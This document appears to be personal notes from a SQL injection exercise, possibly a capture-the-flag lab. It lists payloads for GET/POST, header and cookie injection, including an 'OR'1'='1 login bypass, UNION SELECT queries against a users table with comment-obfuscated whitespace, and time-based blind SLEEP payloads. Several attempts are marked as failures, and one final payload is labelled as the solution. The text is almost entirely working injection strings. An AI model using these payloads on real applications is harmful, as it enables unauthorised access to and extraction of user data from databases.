 GET/POST
'OR'1'='1
'/**/UNION/**/SELECT*FROM/**/users/**/WHERE/**/id>'
Use of functions in the query:
'/**/UNION/**/SELECT'*','*',CURRENT_ROLE()FROM/**/users/**/WHERE/**/id>'

HEADER INJECTION
SELECT IF(STRCMP(CURRENT_USER(),'temp@%') = 0, 'YES', 'NO`');`
SELECT IF(STRCMP(CURRENT_USER(),"temp@%") = 0, "YES", "NO + `');`
INSERT INTO user_agents VALUES('mozilla'); SELECT IF(2>1, SLEEP(2), 'no`');` 

NO MULTI-STATEMENTS:
INSERT INTO user_agents VALUES('mozilla') UNION SELECT SLEEP('5

INSERT INTO user_agents VALUES('mozilla'); SELECT IF(2>1, SLEEP(2), 'no');--`');`





COOKIE INJECTION:

Failures: '/**/UNION/**/SELECT/**/SLEEP('5'),null; /*
SELECT * FROM cookies WHERE id=''/**/UNION/**/SELECT/**/SLEEP('5'),null; /*' AND expiration > (SELECT UNIX_TIMESTAMP());
'/**/UNION/**/SELECT/**/SLEEP('3'),null;/*
'/**/UNION/**/SELECT/**/SLEEP('1'),null/**/FROM/**/users/**/WHERE/**/id>;--
'/**/UNION/**/SELECT/**/SLEEP('5'),null; /*
'/**/UNION/**/SELECT/**/SLEEP('5'),null; '';
'/**/UNION/**/SELECT/**/SLEEP('3'),null;--'

Syntactically correct but inapplicable:'/**/UNION/**/SELECT/**/SLEEP('3'),null;--

SOLUTION: '/**/OR/**/(SELECT/**/SLEEP('2'))/**/OR/**/'
(instead of trying to comment out the rest of the query, I decided to try and inject alongside it, as that seemed to be the path of least resistance.)
